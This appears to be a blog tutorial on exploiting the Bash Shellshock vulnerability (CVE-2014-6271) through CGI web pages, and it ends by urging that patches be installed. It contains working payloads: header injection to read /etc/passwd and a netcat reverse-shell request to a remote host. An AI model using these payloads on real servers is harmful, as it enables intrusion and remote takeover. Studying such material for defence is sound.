Exploiting Shellshock

A lot of news articles are published currently about a series of Bugs which were found in Bash recently. This Post shows how to easily write a remote exploit for the first of these Bugs (CVE-2014-6271).

Let us first try to understand how this exploit works. The example test code to check if a bash installation is vulnerable which can be found on many sites is the following:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If this code is executed on a vulnerable system, the output will be

vulnerable 
this is a test

The command “env” is used to set a specific variable (in this example “$x”) within the environment before our test code ”echo this is a test” is executed. The vulnerability is, that bash interprets the string “() {” as the start of a function and evaluates the function before executing the desired command. Note, that the name of the Variable doesn’t matter for the vulnerability to work.

Let us look, how this can be used to remotely exploit a Webserver which uses bash script to deliver web pages. In order to investigate the things which happen here, we setup a small cgi-script with the following content:

#!/bin/bash
echo
env

If we browse to this page, we get a print of all environment variables which are set during the generation of our webpage. Let us browse to this page and set some extra HTTP Headers in advance. I used the Firefox AddOn “Modify Headers” to add the two HTTP-Headers: Foo: bar and Cookie: spam=ham.

What we see in the response is, that several headers which are coming from the client are set as environment variable during execution. In each of these variables we can inject malicious code. This code will be executed before the webpage is delivered, regardless if it is used or not. Let us assume the Webserver executes the following Hello-World Webpage:

#!/bin/bash 
echo 
echo "Hello World!"

Note, that the Webpage itself does not use any user input at all. It just statically prints out “Hello World!”. However, as we have seen before bash uses our input.

We can first try to inject the example test code. Note, that we have to add an empty “echo” to the example in order to get the output to the content of the HTTP Request. (Apache will interpret this as a Response Header otherwise.)

Instead of doing a simple echo, we can execute arbitrary code at the server like “cat /etc/passwd“

And of course open a reverse shell:

% echo |nc 192.168.122.27 80 <<EOF 
GET /cgi-bin/bash.cgi HTTP/1.1 
Host: foo 
Foo: () { :; }; /bin/nc -e /bin/bash 192.168.122.1 2222; 

EOF

I hope everyone understood now that Shellshock can be exploited very easily. Patches are available and should be installed as soon as possible.